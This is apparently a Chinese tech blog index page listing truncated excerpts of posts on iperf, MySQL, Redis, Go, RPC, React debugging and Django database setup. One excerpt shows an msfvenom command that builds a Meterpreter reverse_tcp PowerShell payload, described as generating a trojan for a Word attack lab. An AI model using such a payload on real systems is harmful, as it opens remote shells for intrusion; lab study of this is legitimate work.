iperf是一种命令行工具,用于通过测量服务器可以处理的最大网络吞吐量来诊断网络速度问题。它在遇到网络速度问题时特别有用,通过该工具可以确定哪个服务器无法达到最大吞吐量。 环境: server: centos/redhat 7.4 client:window10 iperf版本: iperf 3.1 ...
分类:
其他好文 时间:
2021-03-29 11:47:49
阅读次数:
0
1.执行安装mysql的语句 sudo apt-get install mysql-server mysql-client 2.查看可登陆账户并查看密码 3.获取到了登陆mysql的账户密码登陆 4.之后依次进入mysql数据库,修改root密码,刷新缓存。之后就可以exit退出使用root账户登录 ...
分类:
数据库 时间:
2021-03-29 11:37:21
阅读次数:
0
注册模块连接redis遇到的问题 1、遇到的问题 redis.exceptions.AuthenticationError: Client sent AUTH, but no password is set 2、解决办法 首先打开redis.windows.service.conf(或redis.w ...
分类:
其他好文 时间:
2021-03-26 15:33:25
阅读次数:
0
package main import ( "fmt" "github.com/go-redis/redis" ) func main() { client := redis.NewClient(&redis.Options{ Addr: "127.0.0.1:6380", Password: "" ...
分类:
其他好文 时间:
2021-03-18 14:25:19
阅读次数:
0
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:
系统相关 时间:
2021-03-18 14:14:35
阅读次数:
0
client 版本0.1 public class RpcParam implements Serializable { private String name; } 版本0.2 public class RpcParam implements Serializable { private Stri ...
分类:
其他好文 时间:
2021-03-17 14:55:50
阅读次数:
0
原文:https://code.visualstudio.com/docs/nodejs/reactjs-tutorial To debug the client side React code, we'll need to install the Debugger for Chrome exten ...
分类:
其他好文 时间:
2021-03-16 14:09:27
阅读次数:
0
告诉mysql客户端这边的文字编码 告诉mysql希望返回的结果集编码; set character_set_client=gbk; set character_set_results=gbk; 查看最大上传文件大小 show global variables like 'max_allowed_p ...
分类:
数据库 时间:
2021-03-16 11:52:41
阅读次数:
0
MySql管理工具 Navicat for MySql的时候,弹出了一个1862 - MySql Your password has expired.To log in you must change it using a client that supports expired password解 ...
分类:
数据库 时间:
2021-03-15 10:43:19
阅读次数:
0
一 资产入库处理 1.1 连接数据库 在192.168.100.101安装数据库,并给总控机授权可以操作,并创建一个autoserver的数据库,密码123456 settiing.py 配置数据库连接 DATABASES = { 'default': { 'ENGINE': 'django.db. ...
分类:
数据库 时间:
2021-03-09 13:41:36
阅读次数:
0